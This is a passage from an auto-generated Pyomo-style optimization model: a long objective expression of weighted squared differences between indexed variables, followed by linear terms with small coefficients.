m.x1218)**2 + (1.3*m.x1217 - 1.3*m.x1218)**2) + 4.89330064653257*((8.11690209768664*m.x1192 -
8.11690209768664*m.x1219)**2 + (1.3*m.x1218 - 1.3*m.x1219)**2) + 4.89330064653257*((
8.11690209768664*m.x1193 - 8.11690209768664*m.x1220)**2 + (1.3*m.x1219 - 1.3*m.x1220)**2) +
4.89330064653257*((8.11690209768664*m.x1194 - 8.11690209768664*m.x1221)**2 + (1.3*m.x1220 - 1.3*
m.x1221)**2) + 4.89330064653257*((8.11690209768664*m.x1195 - 8.11690209768664*m.x1222)**2 + (1.3*
m.x1221 - 1.3*m.x1222)**2) + 4.89330064653257*((8.11690209768664*m.x1196 - 8.11690209768664*
m.x1223)**2 + (1.3*m.x1222 - 1.3*m.x1223)**2) + 4.89330064653257*((8.11690209768664*m.x1197 -
8.11690209768664*m.x1224)**2 + (1.3*m.x1223 - 1.3*m.x1224)**2) + 4.89330064653257*((
8.11690209768664*m.x1198 - 8.11690209768664*m.x1225)**2 + (1.3*m.x1224 - 1.3*m.x1225)**2) +
4.89330064653257*((8.11690209768664*m.x1199 - 8.11690209768664*m.x1226)**2 + (1.3*m.x1225 - 1.3*
m.x1226)**2) + 4.89330064653257*((8.11690209768664*m.x1200 - 8.11690209768664*m.x1227)**2 + (1.3*
m.x1226 - 1.3*m.x1227)**2) + 4.89330064653257*((8.11690209768664*m.x1201 - 8.11690209768664*
m.x1228)**2 + (1.3*m.x1227 - 1.3*m.x1228)**2) + 4.89330064653257*((8.11690209768664*m.x1202 -
8.11690209768664*m.x1229)**2 + (1.3*m.x1228 - 1.3*m.x1229)**2) + 4.89330064653257*((
8.11690209768664*m.x1203 - 8.11690209768664*m.x1230)**2 + (1.3*m.x1229 - 1.3*m.x1230)**2) +
4.89330064653257*((8.11690209768664*m.x1204 - 8.11690209768664*m.x1231)**2 + (1.3*m.x1230 - 1.3*
m.x1231)**2) + 4.89330064653257*((8.11690209768664*m.x1205 - 8.11690209768664*m.x1232)**2 + (1.3*
m.x1231 - 1.3*m.x1232)**2) + 4.89330064653257*((8.11690209768664*m.x1206 - 8.11690209768664*
m.x1233)**2 + (1.3*m.x1232 - 1.3*m.x1233)**2) + 4.89330064653257*((8.11690209768664*m.x1207 -
8.11690209768664*m.x1234)**2 + (1.3*m.x1233 - 1.3*m.x1234)**2) + 4.89330064653257*((
8.11690209768664*m.x1208 - 8.11690209768664*m.x1235)**2 + (1.3*m.x1234 - 1.3*m.x1235)**2) +
4.89330064653257*((8.11690209768664*m.x1209 - 8.11690209768664*m.x1236)**2 + (1.3*m.x1235 - 1.3*
m.x1236)**2) + 4.89330064653257*((8.11690209768664*m.x1210 - 8.11690209768664*m.x1237)**2 + (1.3*
m.x1236 - 1.3*m.x1237)**2) + 4.89330064653257*((8.11690209768664*m.x1211 - 8.11690209768664*
m.x1238)**2 + (1.3*m.x1237 - 1.3*m.x1238)**2) + 4.89330064653257*((8.11690209768664*m.x1212 -
8.11690209768664*m.x1239)**2 + (1.3*m.x1238 - 1.3*m.x1239)**2) + 4.89330064653257*((
8.11690209768664*m.x1213 - 8.11690209768664*m.x1240)**2 + (1.3*m.x1239 - 1.3*m.x1240)**2) +
4.89330064653257*((8.11690209768664*m.x1214 - 8.11690209768664*m.x1241)**2 + (1.3*m.x1240 - 1.3*
m.x1241)**2) + 4.89330064653257*((8.11690209768664*m.x1215 - 8.11690209768664*m.x1242)**2 + (1.3*
m.x1241 - 1.3*m.x1242)**2) + 5.00775685244557*((8.11690209768664*m.x1217 - 8.11690209768664*
m.x1244)**2 + (1.3*m.x1243 - 1.3*m.x1244)**2) + 5.00775685244557*((8.11690209768664*m.x1218 -
8.11690209768664*m.x1245)**2 + (1.3*m.x1244 - 1.3*m.x1245)**2) + 5.00775685244557*((
8.11690209768664*m.x1219 - 8.11690209768664*m.x1246)**2 + (1.3*m.x1245 - 1.3*m.x1246)**2) +
5.00775685244557*((8.11690209768664*m.x1220 - 8.11690209768664*m.x1247)**2 + (1.3*m.x1246 - 1.3*
m.x1247)**2) + 5.00775685244557*((8.11690209768664*m.x1221 - 8.11690209768664*m.x1248)**2 + (1.3*
m.x1247 - 1.3*m.x1248)**2) + 5.00775685244557*((8.11690209768664*m.x1222 - 8.11690209768664*
m.x1249)**2 + (1.3*m.x1248 - 1.3*m.x1249)**2) + 5.00775685244557*((8.11690209768664*m.x1223 -
8.11690209768664*m.x1250)**2 + (1.3*m.x1249 - 1.3*m.x1250)**2) + 5.00775685244557*((
8.11690209768664*m.x1224 - 8.11690209768664*m.x1251)**2 + (1.3*m.x1250 - 1.3*m.x1251)**2) +
5.00775685244557*((8.11690209768664*m.x1225 - 8.11690209768664*m.x1252)**2 + (1.3*m.x1251 - 1.3*
m.x1252)**2) + 5.00775685244557*((8.11690209768664*m.x1226 - 8.11690209768664*m.x1253)**2 + (1.3*
m.x1252 - 1.3*m.x1253)**2) + 5.00775685244557*((8.11690209768664*m.x1227 - 8.11690209768664*
m.x1254)**2 + (1.3*m.x1253 - 1.3*m.x1254)**2) + 5.00775685244557*((8.11690209768664*m.x1228 -
8.11690209768664*m.x1255)**2 + (1.3*m.x1254 - 1.3*m.x1255)**2) + 5.00775685244557*((
8.11690209768664*m.x1229 - 8.11690209768664*m.x1256)**2 + (1.3*m.x1255 - 1.3*m.x1256)**2) +
5.00775685244557*((8.11690209768664*m.x1230 - 8.11690209768664*m.x1257)**2 + (1.3*m.x1256 - 1.3*
m.x1257)**2) + 5.00775685244557*((8.11690209768664*m.x1231 - 8.11690209768664*m.x1258)**2 + (1.3*
m.x1257 - 1.3*m.x1258)**2) + 5.00775685244557*((8.11690209768664*m.x1232 - 8.11690209768664*
m.x1259)**2 + (1.3*m.x1258 - 1.3*m.x1259)**2) + 5.00775685244557*((8.11690209768664*m.x1233 -
8.11690209768664*m.x1260)**2 + (1.3*m.x1259 - 1.3*m.x1260)**2) + 5.00775685244557*((
8.11690209768664*m.x1234 - 8.11690209768664*m.x1261)**2 + (1.3*m.x1260 - 1.3*m.x1261)**2) +
5.00775685244557*((8.11690209768664*m.x1235 - 8.11690209768664*m.x1262)**2 + (1.3*m.x1261 - 1.3*
m.x1262)**2) + 5.00775685244557*((8.11690209768664*m.x1236 - 8.11690209768664*m.x1263)**2 + (1.3*
m.x1262 - 1.3*m.x1263)**2) + 5.00775685244557*((8.11690209768664*m.x1237 - 8.11690209768664*
m.x1264)**2 + (1.3*m.x1263 - 1.3*m.x1264)**2) + 5.00775685244557*((8.11690209768664*m.x1238 -
8.11690209768664*m.x1265)**2 + (1.3*m.x1264 - 1.3*m.x1265)**2) + 5.00775685244557*((
8.11690209768664*m.x1239 - 8.11690209768664*m.x1266)**2 + (1.3*m.x1265 - 1.3*m.x1266)**2) +
5.00775685244557*((8.11690209768664*m.x1240 - 8.11690209768664*m.x1267)**2 + (1.3*m.x1266 - 1.3*
m.x1267)**2) + 5.00775685244557*((8.11690209768664*m.x1241 - 8.11690209768664*m.x1268)**2 + (1.3*
m.x1267 - 1.3*m.x1268)**2) + 5.00775685244557*((8.11690209768664*m.x1242 - 8.11690209768664*
m.x1269)**2 + (1.3*m.x1268 - 1.3*m.x1269)**2) + 5.10732217350308*((8.11690209768664*m.x1244 -
8.11690209768664*m.x1271)**2 + (1.3*m.x1270 - 1.3*m.x1271)**2) + 5.10732217350308*((
8.11690209768664*m.x1245 - 8.11690209768664*m.x1272)**2 + (1.3*m.x1271 - 1.3*m.x1272)**2) +
5.10732217350308*((8.11690209768664*m.x1246 - 8.11690209768664*m.x1273)**2 + (1.3*m.x1272 - 1.3*
m.x1273)**2) + 5.10732217350308*((8.11690209768664*m.x1247 - 8.11690209768664*m.x1274)**2 + (1.3*
m.x1273 - 1.3*m.x1274)**2) + 5.10732217350308*((8.11690209768664*m.x1248 - 8.11690209768664*
m.x1275)**2 + (1.3*m.x1274 - 1.3*m.x1275)**2) + 5.10732217350308*((8.11690209768664*m.x1249 -
8.11690209768664*m.x1276)**2 + (1.3*m.x1275 - 1.3*m.x1276)**2) + 5.10732217350308*((
8.11690209768664*m.x1250 - 8.11690209768664*m.x1277)**2 + (1.3*m.x1276 - 1.3*m.x1277)**2) +
5.10732217350308*((8.11690209768664*m.x1251 - 8.11690209768664*m.x1278)**2 + (1.3*m.x1277 - 1.3*
m.x1278)**2) + 5.10732217350308*((8.11690209768664*m.x1252 - 8.11690209768664*m.x1279)**2 + (1.3*
m.x1278 - 1.3*m.x1279)**2) + 5.10732217350308*((8.11690209768664*m.x1253 - 8.11690209768664*
m.x1280)**2 + (1.3*m.x1279 - 1.3*m.x1280)**2) + 5.10732217350308*((8.11690209768664*m.x1254 -
8.11690209768664*m.x1281)**2 + (1.3*m.x1280 - 1.3*m.x1281)**2) + 5.10732217350308*((
8.11690209768664*m.x1255 - 8.11690209768664*m.x1282)**2 + (1.3*m.x1281 - 1.3*m.x1282)**2) +
5.10732217350308*((8.11690209768664*m.x1256 - 8.11690209768664*m.x1283)**2 + (1.3*m.x1282 - 1.3*
m.x1283)**2) + 5.10732217350308*((8.11690209768664*m.x1257 - 8.11690209768664*m.x1284)**2 + (1.3*
m.x1283 - 1.3*m.x1284)**2) + 5.10732217350308*((8.11690209768664*m.x1258 - 8.11690209768664*
m.x1285)**2 + (1.3*m.x1284 - 1.3*m.x1285)**2) + 5.10732217350308*((8.11690209768664*m.x1259 -
8.11690209768664*m.x1286)**2 + (1.3*m.x1285 - 1.3*m.x1286)**2) + 5.10732217350308*((
8.11690209768664*m.x1260 - 8.11690209768664*m.x1287)**2 + (1.3*m.x1286 - 1.3*m.x1287)**2) +
5.10732217350308*((8.11690209768664*m.x1261 - 8.11690209768664*m.x1288)**2 + (1.3*m.x1287 - 1.3*
m.x1288)**2) + 5.10732217350308*((8.11690209768664*m.x1262 - 8.11690209768664*m.x1289)**2 + (1.3*
m.x1288 - 1.3*m.x1289)**2) + 5.10732217350308*((8.11690209768664*m.x1263 - 8.11690209768664*
m.x1290)**2 + (1.3*m.x1289 - 1.3*m.x1290)**2) + 5.10732217350308*((8.11690209768664*m.x1264 -
8.11690209768664*m.x1291)**2 + (1.3*m.x1290 - 1.3*m.x1291)**2) + 5.10732217350308*((
8.11690209768664*m.x1265 - 8.11690209768664*m.x1292)**2 + (1.3*m.x1291 - 1.3*m.x1292)**2) +
5.10732217350308*((8.11690209768664*m.x1266 - 8.11690209768664*m.x1293)**2 + (1.3*m.x1292 - 1.3*
m.x1293)**2) + 5.10732217350308*((8.11690209768664*m.x1267 - 8.11690209768664*m.x1294)**2 + (1.3*
m.x1293 - 1.3*m.x1294)**2) + 5.10732217350308*((8.11690209768664*m.x1268 - 8.11690209768664*
m.x1295)**2 + (1.3*m.x1294 - 1.3*m.x1295)**2) + 5.10732217350308*((8.11690209768664*m.x1269 -
8.11690209768664*m.x1296)**2 + (1.3*m.x1295 - 1.3*m.x1296)**2) + 5.18982110091268*((
8.11690209768664*m.x1271 - 8.11690209768664*m.x1298)**2 + (1.3*m.x1297 - 1.3*m.x1298)**2) +
5.18982110091268*((8.11690209768664*m.x1272 - 8.11690209768664*m.x1299)**2 + (1.3*m.x1298 - 1.3*
m.x1299)**2) + 5.18982110091268*((8.11690209768664*m.x1273 - 8.11690209768664*m.x1300)**2 + (1.3*
m.x1299 - 1.3*m.x1300)**2) + 5.18982110091268*((8.11690209768664*m.x1274 - 8.11690209768664*
m.x1301)**2 + (1.3*m.x1300 - 1.3*m.x1301)**2) + 5.18982110091268*((8.11690209768664*m.x1275 -
8.11690209768664*m.x1302)**2 + (1.3*m.x1301 - 1.3*m.x1302)**2) + 5.18982110091268*((
8.11690209768664*m.x1276 - 8.11690209768664*m.x1303)**2 + (1.3*m.x1302 - 1.3*m.x1303)**2) +
5.18982110091268*((8.11690209768664*m.x1277 - 8.11690209768664*m.x1304)**2 + (1.3*m.x1303 - 1.3*
m.x1304)**2) + 5.18982110091268*((8.11690209768664*m.x1278 - 8.11690209768664*m.x1305)**2 + (1.3*
m.x1304 - 1.3*m.x1305)**2) + 5.18982110091268*((8.11690209768664*m.x1279 - 8.11690209768664*
m.x1306)**2 + (1.3*m.x1305 - 1.3*m.x1306)**2) + 5.18982110091268*((8.11690209768664*m.x1280 -
8.11690209768664*m.x1307)**2 + (1.3*m.x1306 - 1.3*m.x1307)**2) + 5.18982110091268*((
8.11690209768664*m.x1281 - 8.11690209768664*m.x1308)**2 + (1.3*m.x1307 - 1.3*m.x1308)**2) +
5.18982110091268*((8.11690209768664*m.x1282 - 8.11690209768664*m.x1309)**2 + (1.3*m.x1308 - 1.3*
m.x1309)**2) + 5.18982110091268*((8.11690209768664*m.x1283 - 8.11690209768664*m.x1310)**2 + (1.3*
m.x1309 - 1.3*m.x1310)**2) + 5.18982110091268*((8.11690209768664*m.x1284 - 8.11690209768664*
m.x1311)**2 + (1.3*m.x1310 - 1.3*m.x1311)**2) + 5.18982110091268*((8.11690209768664*m.x1285 -
8.11690209768664*m.x1312)**2 + (1.3*m.x1311 - 1.3*m.x1312)**2) + 5.18982110091268*((
8.11690209768664*m.x1286 - 8.11690209768664*m.x1313)**2 + (1.3*m.x1312 - 1.3*m.x1313)**2) +
5.18982110091268*((8.11690209768664*m.x1287 - 8.11690209768664*m.x1314)**2 + (1.3*m.x1313 - 1.3*
m.x1314)**2) + 5.18982110091268*((8.11690209768664*m.x1288 - 8.11690209768664*m.x1315)**2 + (1.3*
m.x1314 - 1.3*m.x1315)**2) + 5.18982110091268*((8.11690209768664*m.x1289 - 8.11690209768664*
m.x1316)**2 + (1.3*m.x1315 - 1.3*m.x1316)**2) + 5.18982110091268*((8.11690209768664*m.x1290 -
8.11690209768664*m.x1317)**2 + (1.3*m.x1316 - 1.3*m.x1317)**2) + 5.18982110091268*((
8.11690209768664*m.x1291 - 8.11690209768664*m.x1318)**2 + (1.3*m.x1317 - 1.3*m.x1318)**2) +
5.18982110091268*((8.11690209768664*m.x1292 - 8.11690209768664*m.x1319)**2 + (1.3*m.x1318 - 1.3*
m.x1319)**2) + 5.18982110091268*((8.11690209768664*m.x1293 - 8.11690209768664*m.x1320)**2 + (1.3*
m.x1319 - 1.3*m.x1320)**2) + 5.18982110091268*((8.11690209768664*m.x1294 - 8.11690209768664*
m.x1321)**2 + (1.3*m.x1320 - 1.3*m.x1321)**2) + 5.18982110091268*((8.11690209768664*m.x1295 -
8.11690209768664*m.x1322)**2 + (1.3*m.x1321 - 1.3*m.x1322)**2) + 5.18982110091268*((
8.11690209768664*m.x1296 - 8.11690209768664*m.x1323)**2 + (1.3*m.x1322 - 1.3*m.x1323)**2) +
5.25340790999348*((8.11690209768664*m.x1298 - 8.11690209768664*m.x1325)**2 + (1.3*m.x1324 - 1.3*
m.x1325)**2) + 5.25340790999348*((8.11690209768664*m.x1299 - 8.11690209768664*m.x1326)**2 + (1.3*
m.x1325 - 1.3*m.x1326)**2) + 5.25340790999348*((8.11690209768664*m.x1300 - 8.11690209768664*
m.x1327)**2 + (1.3*m.x1326 - 1.3*m.x1327)**2) + 5.25340790999348*((8.11690209768664*m.x1301 -
8.11690209768664*m.x1328)**2 + (1.3*m.x1327 - 1.3*m.x1328)**2) + 5.25340790999348*((
8.11690209768664*m.x1302 - 8.11690209768664*m.x1329)**2 + (1.3*m.x1328 - 1.3*m.x1329)**2) +
5.25340790999348*((8.11690209768664*m.x1303 - 8.11690209768664*m.x1330)**2 + (1.3*m.x1329 - 1.3*
m.x1330)**2) + 5.25340790999348*((8.11690209768664*m.x1304 - 8.11690209768664*m.x1331)**2 + (1.3*
m.x1330 - 1.3*m.x1331)**2) + 5.25340790999348*((8.11690209768664*m.x1305 - 8.11690209768664*
m.x1332)**2 + (1.3*m.x1331 - 1.3*m.x1332)**2) + 5.25340790999348*((8.11690209768664*m.x1306 -
8.11690209768664*m.x1333)**2 + (1.3*m.x1332 - 1.3*m.x1333)**2) + 5.25340790999348*((
8.11690209768664*m.x1307 - 8.11690209768664*m.x1334)**2 + (1.3*m.x1333 - 1.3*m.x1334)**2) +
5.25340790999348*((8.11690209768664*m.x1308 - 8.11690209768664*m.x1335)**2 + (1.3*m.x1334 - 1.3*
m.x1335)**2) + 5.25340790999348*((8.11690209768664*m.x1309 - 8.11690209768664*m.x1336)**2 + (1.3*
m.x1335 - 1.3*m.x1336)**2) + 5.25340790999348*((8.11690209768664*m.x1310 - 8.11690209768664*
m.x1337)**2 + (1.3*m.x1336 - 1.3*m.x1337)**2) + 5.25340790999348*((8.11690209768664*m.x1311 -
8.11690209768664*m.x1338)**2 + (1.3*m.x1337 - 1.3*m.x1338)**2) + 5.25340790999348*((
8.11690209768664*m.x1312 - 8.11690209768664*m.x1339)**2 + (1.3*m.x1338 - 1.3*m.x1339)**2) +
5.25340790999348*((8.11690209768664*m.x1313 - 8.11690209768664*m.x1340)**2 + (1.3*m.x1339 - 1.3*
m.x1340)**2) + 5.25340790999348*((8.11690209768664*m.x1314 - 8.11690209768664*m.x1341)**2 + (1.3*
m.x1340 - 1.3*m.x1341)**2) + 5.25340790999348*((8.11690209768664*m.x1315 - 8.11690209768664*
m.x1342)**2 + (1.3*m.x1341 - 1.3*m.x1342)**2) + 5.25340790999348*((8.11690209768664*m.x1316 -
8.11690209768664*m.x1343)**2 + (1.3*m.x1342 - 1.3*m.x1343)**2) + 5.25340790999348*((
8.11690209768664*m.x1317 - 8.11690209768664*m.x1344)**2 + (1.3*m.x1343 - 1.3*m.x1344)**2) +
5.25340790999348*((8.11690209768664*m.x1318 - 8.11690209768664*m.x1345)**2 + (1.3*m.x1344 - 1.3*
m.x1345)**2) + 5.25340790999348*((8.11690209768664*m.x1319 - 8.11690209768664*m.x1346)**2 + (1.3*
m.x1345 - 1.3*m.x1346)**2) + 5.25340790999348*((8.11690209768664*m.x1320 - 8.11690209768664*
m.x1347)**2 + (1.3*m.x1346 - 1.3*m.x1347)**2) + 5.25340790999348*((8.11690209768664*m.x1321 -
8.11690209768664*m.x1348)**2 + (1.3*m.x1347 - 1.3*m.x1348)**2) + 5.25340790999348*((
8.11690209768664*m.x1322 - 8.11690209768664*m.x1349)**2 + (1.3*m.x1348 - 1.3*m.x1349)**2) +
5.25340790999348*((8.11690209768664*m.x1323 - 8.11690209768664*m.x1350)**2 + (1.3*m.x1349 - 1.3*
m.x1350)**2) + 5.29663380807567*((8.11690209768664*m.x1325 - 8.11690209768664*m.x1352)**2 + (1.3*
m.x1351 - 1.3*m.x1352)**2) + 5.29663380807567*((8.11690209768664*m.x1326 - 8.11690209768664*
m.x1353)**2 + (1.3*m.x1352 - 1.3*m.x1353)**2) + 5.29663380807567*((8.11690209768664*m.x1327 -
8.11690209768664*m.x1354)**2 + (1.3*m.x1353 - 1.3*m.x1354)**2) + 5.29663380807567*((
8.11690209768664*m.x1328 - 8.11690209768664*m.x1355)**2 + (1.3*m.x1354 - 1.3*m.x1355)**2) +
5.29663380807567*((8.11690209768664*m.x1329 - 8.11690209768664*m.x1356)**2 + (1.3*m.x1355 - 1.3*
m.x1356)**2) + 5.29663380807567*((8.11690209768664*m.x1330 - 8.11690209768664*m.x1357)**2 + (1.3*
m.x1356 - 1.3*m.x1357)**2) + 5.29663380807567*((8.11690209768664*m.x1331 - 8.11690209768664*
m.x1358)**2 + (1.3*m.x1357 - 1.3*m.x1358)**2) + 5.29663380807567*((8.11690209768664*m.x1332 -
8.11690209768664*m.x1359)**2 + (1.3*m.x1358 - 1.3*m.x1359)**2) + 5.29663380807567*((
8.11690209768664*m.x1333 - 8.11690209768664*m.x1360)**2 + (1.3*m.x1359 - 1.3*m.x1360)**2) +
5.29663380807567*((8.11690209768664*m.x1334 - 8.11690209768664*m.x1361)**2 + (1.3*m.x1360 - 1.3*
m.x1361)**2) + 5.29663380807567*((8.11690209768664*m.x1335 - 8.11690209768664*m.x1362)**2 + (1.3*
m.x1361 - 1.3*m.x1362)**2) + 5.29663380807567*((8.11690209768664*m.x1336 - 8.11690209768664*
m.x1363)**2 + (1.3*m.x1362 - 1.3*m.x1363)**2) + 5.29663380807567*((8.11690209768664*m.x1337 -
8.11690209768664*m.x1364)**2 + (1.3*m.x1363 - 1.3*m.x1364)**2) + 5.29663380807567*((
8.11690209768664*m.x1338 - 8.11690209768664*m.x1365)**2 + (1.3*m.x1364 - 1.3*m.x1365)**2) +
5.29663380807567*((8.11690209768664*m.x1339 - 8.11690209768664*m.x1366)**2 + (1.3*m.x1365 - 1.3*
m.x1366)**2) + 5.29663380807567*((8.11690209768664*m.x1340 - 8.11690209768664*m.x1367)**2 + (1.3*
m.x1366 - 1.3*m.x1367)**2) + 5.29663380807567*((8.11690209768664*m.x1341 - 8.11690209768664*
m.x1368)**2 + (1.3*m.x1367 - 1.3*m.x1368)**2) + 5.29663380807567*((8.11690209768664*m.x1342 -
8.11690209768664*m.x1369)**2 + (1.3*m.x1368 - 1.3*m.x1369)**2) + 5.29663380807567*((
8.11690209768664*m.x1343 - 8.11690209768664*m.x1370)**2 + (1.3*m.x1369 - 1.3*m.x1370)**2) +
5.29663380807567*((8.11690209768664*m.x1344 - 8.11690209768664*m.x1371)**2 + (1.3*m.x1370 - 1.3*
m.x1371)**2) + 5.29663380807567*((8.11690209768664*m.x1345 - 8.11690209768664*m.x1372)**2 + (1.3*
m.x1371 - 1.3*m.x1372)**2) + 5.29663380807567*((8.11690209768664*m.x1346 - 8.11690209768664*
m.x1373)**2 + (1.3*m.x1372 - 1.3*m.x1373)**2) + 5.29663380807567*((8.11690209768664*m.x1347 -
8.11690209768664*m.x1374)**2 + (1.3*m.x1373 - 1.3*m.x1374)**2) + 5.29663380807567*((
8.11690209768664*m.x1348 - 8.11690209768664*m.x1375)**2 + (1.3*m.x1374 - 1.3*m.x1375)**2) +
5.29663380807567*((8.11690209768664*m.x1349 - 8.11690209768664*m.x1376)**2 + (1.3*m.x1375 - 1.3*
m.x1376)**2) + 5.29663380807567*((8.11690209768664*m.x1350 - 8.11690209768664*m.x1377)**2 + (1.3*
m.x1376 - 1.3*m.x1377)**2) + 5.31850108076342*((8.11690209768664*m.x1352 - 8.11690209768664*
m.x1379)**2 + (1.3*m.x1378 - 1.3*m.x1379)**2) + 5.31850108076342*((8.11690209768664*m.x1353 -
8.11690209768664*m.x1380)**2 + (1.3*m.x1379 - 1.3*m.x1380)**2) + 5.31850108076342*((
8.11690209768664*m.x1354 - 8.11690209768664*m.x1381)**2 + (1.3*m.x1380 - 1.3*m.x1381)**2) +
5.31850108076342*((8.11690209768664*m.x1355 - 8.11690209768664*m.x1382)**2 + (1.3*m.x1381 - 1.3*
m.x1382)**2) + 5.31850108076342*((8.11690209768664*m.x1356 - 8.11690209768664*m.x1383)**2 + (1.3*
m.x1382 - 1.3*m.x1383)**2) + 5.31850108076342*((8.11690209768664*m.x1357 - 8.11690209768664*
m.x1384)**2 + (1.3*m.x1383 - 1.3*m.x1384)**2) + 5.31850108076342*((8.11690209768664*m.x1358 -
8.11690209768664*m.x1385)**2 + (1.3*m.x1384 - 1.3*m.x1385)**2) + 5.31850108076342*((
8.11690209768664*m.x1359 - 8.11690209768664*m.x1386)**2 + (1.3*m.x1385 - 1.3*m.x1386)**2) +
5.31850108076342*((8.11690209768664*m.x1360 - 8.11690209768664*m.x1387)**2 + (1.3*m.x1386 - 1.3*
m.x1387)**2) + 5.31850108076342*((8.11690209768664*m.x1361 - 8.11690209768664*m.x1388)**2 + (1.3*
m.x1387 - 1.3*m.x1388)**2) + 5.31850108076342*((8.11690209768664*m.x1362 - 8.11690209768664*
m.x1389)**2 + (1.3*m.x1388 - 1.3*m.x1389)**2) + 5.31850108076342*((8.11690209768664*m.x1363 -
8.11690209768664*m.x1390)**2 + (1.3*m.x1389 - 1.3*m.x1390)**2) + 5.31850108076342*((
8.11690209768664*m.x1364 - 8.11690209768664*m.x1391)**2 + (1.3*m.x1390 - 1.3*m.x1391)**2) +
5.31850108076342*((8.11690209768664*m.x1365 - 8.11690209768664*m.x1392)**2 + (1.3*m.x1391 - 1.3*
m.x1392)**2) + 5.31850108076342*((8.11690209768664*m.x1366 - 8.11690209768664*m.x1393)**2 + (1.3*
m.x1392 - 1.3*m.x1393)**2) + 5.31850108076342*((8.11690209768664*m.x1367 - 8.11690209768664*
m.x1394)**2 + (1.3*m.x1393 - 1.3*m.x1394)**2) + 5.31850108076342*((8.11690209768664*m.x1368 -
8.11690209768664*m.x1395)**2 + (1.3*m.x1394 - 1.3*m.x1395)**2) + 5.31850108076342*((
8.11690209768664*m.x1369 - 8.11690209768664*m.x1396)**2 + (1.3*m.x1395 - 1.3*m.x1396)**2) +
5.31850108076342*((8.11690209768664*m.x1370 - 8.11690209768664*m.x1397)**2 + (1.3*m.x1396 - 1.3*
m.x1397)**2) + 5.31850108076342*((8.11690209768664*m.x1371 - 8.11690209768664*m.x1398)**2 + (1.3*
m.x1397 - 1.3*m.x1398)**2) + 5.31850108076342*((8.11690209768664*m.x1372 - 8.11690209768664*
m.x1399)**2 + (1.3*m.x1398 - 1.3*m.x1399)**2) + 5.31850108076342*((8.11690209768664*m.x1373 -
8.11690209768664*m.x1400)**2 + (1.3*m.x1399 - 1.3*m.x1400)**2) + 5.31850108076342*((
8.11690209768664*m.x1374 - 8.11690209768664*m.x1401)**2 + (1.3*m.x1400 - 1.3*m.x1401)**2) +
5.31850108076342*((8.11690209768664*m.x1375 - 8.11690209768664*m.x1402)**2 + (1.3*m.x1401 - 1.3*
m.x1402)**2) + 5.31850108076342*((8.11690209768664*m.x1376 - 8.11690209768664*m.x1403)**2 + (1.3*
m.x1402 - 1.3*m.x1403)**2) + 5.31850108076342*((8.11690209768664*m.x1377 - 8.11690209768664*
m.x1404)**2 + (1.3*m.x1403 - 1.3*m.x1404)**2)) - 0.00116460015434231*m.x28 - 0.00116460015434231*
m.x29 - 0.00116460015434231*m.x30 - 0.00116460015434231*m.x31 - 0.00116460015434231*m.x32 -
0.00116460015434231*m.x33 - 0.00116460015434231*m.x34 - 0.00116460015434231*m.x35 -
0.00116460015434231*m.x36 - 0.00116460015434231*m.x37 - 0.00116460015434231*m.x38 -
0.00116460015434231*m.x39 - 0.00116460015434231*m.x40 - 0.00116460015434231*m.x41 -
0.00116460015434231*m.x42 - 0.00116460015434231*m.x43 - 0.00116460015434231*m.x44 -
0.00116460015434231*m.x45 - 0.00116460015434231*m.x46 - 0.00116460015434231*m.x47 -
0.00116460015434231*m.x48 - 0.00116460015434231*m.x49 - 0.00116460015434231*m.x50 -
0.00116460015434231*m.x51 - 0.00116460015434231*m.x52 - 0.00116460015434231*m.x53 -
0.00116460015434231*m.x54 - 0.00231154615747281*m.x55 - 0.00231154615747281*m.x56 -
0.00231154615747281*m.x57 - 0.00231154615747281*m.x58 - 0.00231154615747281*m.x59 -
0.00231154615747281*m.x60 - 0.00231154615747281*m.x61 - 0.00231154615747281*m.x62 -
0.00231154615747281*m.x63 - 0.00231154615747281*m.x64 - 0.00231154615747281*m.x65 -
0.00231154615747281*m.x66 - 0.00231154615747281*m.x67 - 0.00231154615747281*m.x68 -
0.00231154615747281*m.x69 - 0.00231154615747281*m.x70 - 0.00231154615747281*m.x71 -
0.00231154615747281*m.x72 - 0.00231154615747281*m.x73 - 0.00231154615747281*m.x74 -
0.00231154615747281*m.x75 - 0.00231154615747281*m.x76 - 0.00231154615747281*m.x77 -
0.00231154615747281*m.x78 - 0.00231154615747281*m.x79 - 0.00231154615747281*m.x80 -
0.00231154615747281*m.x81 - 0.00342345147711644*m.x82 - 0.00342345147711644*m.x83 -
0.00342345147711644*m.x84 - 0.00342345147711644*m.x85 - 0.00342345147711644*m.x86 -
0.00342345147711644*m.x87 - 0.00342345147711644*m.x88 - 0.00342345147711644*m.x89 -
0.00342345147711644*m.x90 - 0.00342345147711644*m.x91 - 0.00342345147711644*m.x92 -
0.00342345147711644*m.x93 - 0.00342345147711644*m.x94 - 0.00342345147711644*m.x95 -
0.00342345147711644*m.x96 - 0.00342345147711644*m.x97 - 0.00342345147711644*m.x98 -
0.00342345147711644*m.x99 - 0.00342345147711644*m.x100 - 0.00342345147711644*m.x101 -
0.00342345147711644*m.x102 - 0.00342345147711644*m.x103 - 0.00342345147711644*m.x104 -
0.00342345147711644*m.x105 - 0.00342345147711644*m.x106 - 0.00342345147711644*m.x107 -
0.00342345147711644*m.x108 - 0.00448346076204127*m.x109 - 0.00448346076204127*m.x110 -
0.00448346076204127*m.x111 - 0.00448346076204127*m.x112 - 0.00448346076204127*m.x113 -
0.00448346076204127*m.x114 - 0.00448346076204127*m.x115 - 0.00448346076204127*m.x116 -
0.00448346076204127*m.x117 - 0.00448346076204127*m.x118 - 0.00448346076204127*m.x119 -
0.00448346076204127*m.x120 - 0.00448346076204127*m.x121 - 0.00448346076204127*m.x122 -
0.00448346076204127*m.x123 - 0.00448346076204127*m.x124 - 0.00448346076204127*m.x125 -
0.00448346076204127*m.x126 - 0.00448346076204127*m.x127 - 0.00448346076204127*m.x128 -
0.00448346076204127*m.x129 - 0.00448346076204127*m.x130 - 0.00448346076204127*m.x131 -
0.00448346076204127*m.x132 - 0.00448346076204127*m.x133 - 0.00448346076204127*m.x134 -
0.00448346076204127*m.x135 - 0.0054755053520018*m.x136 - 0.0054755053520018*m.x137 -
0.0054755053520018*m.x138 - 0.0054755053520018*m.x139 - 0.0054755053520018*m.x140 -
0.0054755053520018*m.x141 - 0.0054755053520018*m.x142 - 0.0054755053520018*m.x143 -
0.0054755053520018*m.x144 - 0.0054755053520018*m.x145 - 0.0054755053520018*m.x146 -
0.0054755053520018*m.x147 - 0.0054755053520018*m.x148 - 0.0054755053520018*m.x149 -
0.0054755053520018*m.x150 - 0.0054755053520018*m.x151 - 0.0054755053520018*m.x152 -
